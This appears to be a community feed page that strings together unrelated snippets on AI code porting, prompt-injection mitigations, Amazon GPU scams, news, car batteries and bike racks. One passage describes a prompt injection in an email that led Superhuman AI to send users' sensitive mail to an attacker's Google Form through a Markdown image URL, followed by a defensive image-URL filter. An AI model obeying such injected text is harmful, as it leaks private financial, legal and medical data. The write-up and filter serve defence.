Public Feed

Discover recent notes and bookmarks from the community

the short version is that it’s now possible to point a coding agent at some other open source project and effectively tell it “port this to language X and make sure the tests still pass” and have it do exactly that.

Does this library represent a legal violation of copyright of either the Rust library or the Python one?

I decided that the right thing to do here was to keep the open source license and copyright statement from the Python library author and treat what I had built as a derivative work, which is the entire point of open source.

Even if this is legal, is it ethical to build a library in this way?

After sitting on this for a while I’ve come down on yes, provided full credit is given and the license is carefully considered. Open source allows and encourages further derivative works! I never got upset at some university student forking one of my projects on GitHub and hacking in a new feature that they used. I don’t think this is materially different, although a port to another language entirely does feel like a slightly different shape.

The much bigger concern for me is the impact of generative AI on demand for open source. The recent Tailwind story is a visible example of this—while Tailwind blamed LLMs for reduced traffic to their documentation resulting in fewer conversions to their paid component library, I’m suspicious that the reduced demand there is because LLMs make building good-enough versions of those components for free easy enough that people do that instead.

Prevention and Mitigation Strategies

Prompt injection vulnerabilities are possible due to the nature of generative AI. Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection. However, the following measures can mitigate the impact of prompt injections:

  1. Constrain model behavior

Provide specific instructions about the model’s role, capabilities, and limitations within the system prompt. Enforce strict context adherence, limit responses to specific tasks or topics, and instruct the model to ignore attempts to modify core instructions.

  2. Define and validate expected output formats

Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats.

  3. Implement input and output filtering

Define sensitive categories and construct rules for identifying and handling such content. Apply semantic filters and use string-checking to scan for non-allowed content. Evaluate responses using the RAG Triad: Assess context relevance, groundedness, and question/answer relevance to identify potentially malicious outputs.

  4. Enforce privilege control and least privilege access

Provide the application with its own API tokens for extensible functionality, and handle these functions in code rather than providing them to the model. Restrict the model’s access privileges to the minimum necessary for its intended operations.

  5. Require human approval for high-risk actions

Implement human-in-the-loop controls for privileged operations to prevent unauthorized actions.

  6. Segregate and identify external content

Separate and clearly denote untrusted content to limit its influence on user prompts.

  7. Conduct adversarial testing and attack simulations

Perform regular penetration testing and breach simulations, treating the model as an untrusted user to test the effectiveness of trust boundaries and access controls.

When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.

the injection in the email is hidden using white-on-white text, but the attack does not depend on the concealment! The malicious email could simply exist in the victim’s inbox unopened, with a plain-text injection.

This is a quite common use case for email AI companions. The user has asked about emails from the last hour, so the AI retrieves those emails. One of those emails contains the malicious prompt injection, and others contain sensitive private information.

The hidden prompt injection manipulates the AI to do the following:

  1. Take the data from the email search results

  2. Populate the attacker’s Google Form URL with the data from the email search results in the “entry” parameter

  3. Output a Markdown image that contains this Google Form URL

Superhuman has a CSP in place - which prevents outbound requests to malicious domains; however, they have allowed requests to docs.google.com.
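
An output-side check for the exfiltration path described above, as an added example that is not part of the quoted write-up or any vendor's code: a host allowlist alone does not stop the request when the allowed host is shared and the data rides in the query string, so this filter pins images to one asset path and rejects any query. The asset host, path prefix and sample output are hypothetical, and the renderer is assumed to have raw HTML disabled.

```python
import re
from urllib.parse import urlsplit

# Assumption: the assistant's only legitimate images are the app's own static
# assets. Host and path prefix are hypothetical placeholders.
ALLOWED_IMAGE_PREFIXES = (("assets.mailapp.example", "/static/"),)

INLINE_IMG = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
REF_DEF = re.compile(r'^[ \t]{0,3}\[[^\]]+\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$', re.M)

def image_allowed(url):
    """True only for https URLs on a pinned host and path, with no query."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
    except ValueError:
        return False
    path = parts.path
    if parts.scheme != "https" or parts.query or parts.fragment:
        return False  # a query string is where fetched data would travel
    if ".." in path or "%" in path:
        return False  # no traversal or encoded bytes out of the asset path
    return any(host == h and path.startswith(p) for h, p in ALLOWED_IMAGE_PREFIXES)

def sanitize_model_output(markdown):
    """Return (cleaned_markdown, blocked_urls) before the text is rendered."""
    blocked = []

    def drop(url_group, replacement):
        def handler(m):
            if image_allowed(m.group(url_group)):
                return m.group(0)
            blocked.append(m.group(url_group))
            return replacement
        return handler

    cleaned = INLINE_IMG.sub(drop(2, "[image removed]"), markdown)
    # Reference definitions can back an image, so disallowed ones are dropped
    # too (reference-style links to them stop resolving).
    cleaned = REF_DEF.sub(drop(1, ""), cleaned)
    return cleaned, blocked

SAMPLE_OUTPUT = (  # constructed model output, not captured from a real product
    "Here is your summary.\n"
    "![logo](https://assets.mailapp.example/static/logo.png)\n"
    "![status](https://docs.google.com/forms/EXAMPLE?entry=constructed%20inbox%20text)\n"
    "![chart][c]\n\n"
    "[c]: https://docs.google.com/forms/EXAMPLE?entry=constructed\n"
)
```

Logging the `blocked_urls` list gives detection a signal that an injected instruction reached the model, even though the request itself never left the client.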

Amazon letting sellers post ads for ~$3K graphics cards, and then the seller ships them fanny packs. Confirmed multiple times and in reviews.

Almost too tempting...

EDIT: 🤣🤣 Look at seller reviews: https://files.catbox.moe/wg1oqi.png

DON'T DO IT.

Per a previous post, I actually tried it due to the FBA return policy, cause I was putting it on an empty amz card, and cause I was bored. 🥱😏

you get a Fanny pack

I recorded the shit out of opening the package and reported it as fraud. A few people were doing the exact same thing (ordering it in case it was real, and recording opening of the package to CYA) cause we were also bored 😂

out of the norm, you have to take detailed pics and the charge stays on your card until they receive Fanny pack (yes you have to send it back 😂🤣) and ‘inspect it’ I guess due to the massive number of returns and fraud reports+ add to that the normal refund period. Not even a credit to your account would be instant once you return it to a drop off. 😕

Clearly a waste of time but will mess you up serious if you use a debit card or if there is any sort of delay that results in them receiving it late, and taking too long to process it.

Amazon will not make you whole on this. Maybe they give you a shitty coupon (some people reported a $10 credit 😒) and it’s not worth your time.

https://imgur.com/a/dHlrKnh

https://imgur.com/a/tYKVyHz

You'd think Amazon would suspend the seller or remove the listing the moment 20+ people all reported it and returned it for the same reason instead of removing the reviews and letting people get scammed (and then dragging their feet getting the defrauded people their money back)

I just received my AORUS RTX 5090 from Amazon, sold and shipped directly by Amazon as brand new. When I opened the box, it was clearly an open-box item and contained only a PCB with no GPU chip or VRAM installed. How does Amazon ship something like this as new?

I saw that the other day. Was tempted, but then when I checked the store all the reviewers were 1 stars saying that they got a fanny pack instead of what they ordered. Amazon, being Amazon had removed or crossed the review out because it was fulfilled by them not the store, basically allowing them to defraud people

One day the mighty data centre could be toppled into obsolescence by the humble smartphone, said Perplexity CEO Aravind Srinivas on a recent podcast.

Apple's AI system, Apple Intelligence, already runs some features on specialised chips inside the firm's latest range of products.

Microsoft's Copilot+ laptops also include on-device AI processing.

a few years ago I heard about a tiny data centre, the size of a washing machine, that was being operated in Devon, UK. In addition to its computing power, the heat it was releasing was warming a public swimming pool.

He thinks every public building should instead house a small data centre, working in a large network with each other where required, and providing heating as a by-product.

In just the past week, President Donald Trump has ordered defense companies to halt dividends and stock buybacks, and limited executive compensation to $5 million a year; ordered Fannie Mae and Freddie Mac to buy $200 billion of mortgage-backed securities; ordered an array of energy firms to invest in Venezuelan oil infrastructure, called for a 10 percent cap on credit card interest rates; announced steps to ban institutional purchases of single-family homes; and opened a criminal investigation into Jerome Powell's handling of Federal Reserve building renovations in an attempt to influence monetary policy.

In the US it's important to know that you can use the: Energizer TX24HL AGM Motorcycle and ATV 12V Battery as a replacement for the 12 volt. It costs $105 at Amazon. It's been working flawlessly since November of 2023. It may be important to note that in my 2014 the entire car went dead and I had to watch a YouTube to find the emergency hood pull. I had bought the car from a dealer in 2017 so my original 12 volt was between 7 and 9 years old. Absolutely amazing.

I’d caution slightly. This battery seems to be a different physical size than the OEM, and the terminals look different as well. I like this one, because it is a one for one replacement: https://remybattery.com/start-stop-aux18l-auxiliary-battery.html

I worked with Ohmmu to ensure that its LFP battery would work well with an i3. The i3 DC-DC converter's output voltage is ideal for an LFP battery. The 0.5V higher resting voltage of Ohmmu's LFP isn't a problem with an i3's 12V electronics because 12V components are designed to work well with the 14.0+ output voltage of the DC-DC converter. The higher resting voltage and the much more flat voltage vs. charge level curve of a LFP battery means that the risk of all of the spurious DTC's being stored when the OEM battery's voltage drops too low when it fails isn't as great with a LFP battery. My Ohmmu LFP battery has been in our former 2019 and current 2021 i3's for about a year without any problems.

You'll need roughly 12" of space per bike, plus 12" on either side of the bikes on the ends. For example, my 5 bikes needed ~7 feet of wall space. For my area, I used two 8 foot long 2x4s and cut them each down to roughly 84". The upper 2x4 should be mounted roughly 14" above the lower 2x4. This will stagger your bikes so that their handlebars don't clash.

bicycle rack

Lobsters was created by joshua stein with careful design touches to encourage a healthy community:

a tagging system to categorize and filter submissions, a user invitation tree to combat spam, flag explanations to curb punishing disagreement, a strong commitment to transparency, and many more features that have been added over the years.

Trump has been impeached twice, though the Senate acquitted him both times.

In December 2019, the House voted to impeach Trump on two articles, one charging him with abuse of power by asking Ukrainian officials to investigate his political opponent and another that he obstructed the congressional investigation into the matter. In February 2020, the Senate voted to acquit the president, and Sen. Mitt Romney, R-Utah, was the only Republican to cross party lines in voting to convict.

In January 2021, the House voted to impeach Trump again, charging the president with "incitement to insurrection" related to the events at the U.S. Capitol on Jan. 6, 2021. 10 Republicans broke ranks and voted with Democrats to impeach Trump. Only two of those 10 lawmakers are still in office, and one of them has said he will not seek re-election in 2026. The others retired from Congress or lost their races.

The Senate trial occurred after Trump left office, and some Republicans found it unnecessary since he was no longer in power. A majority voted to convict with seven Republicans crossing party lines, but the 57-43 vote fell short of the two-thirds majority needed for a conviction.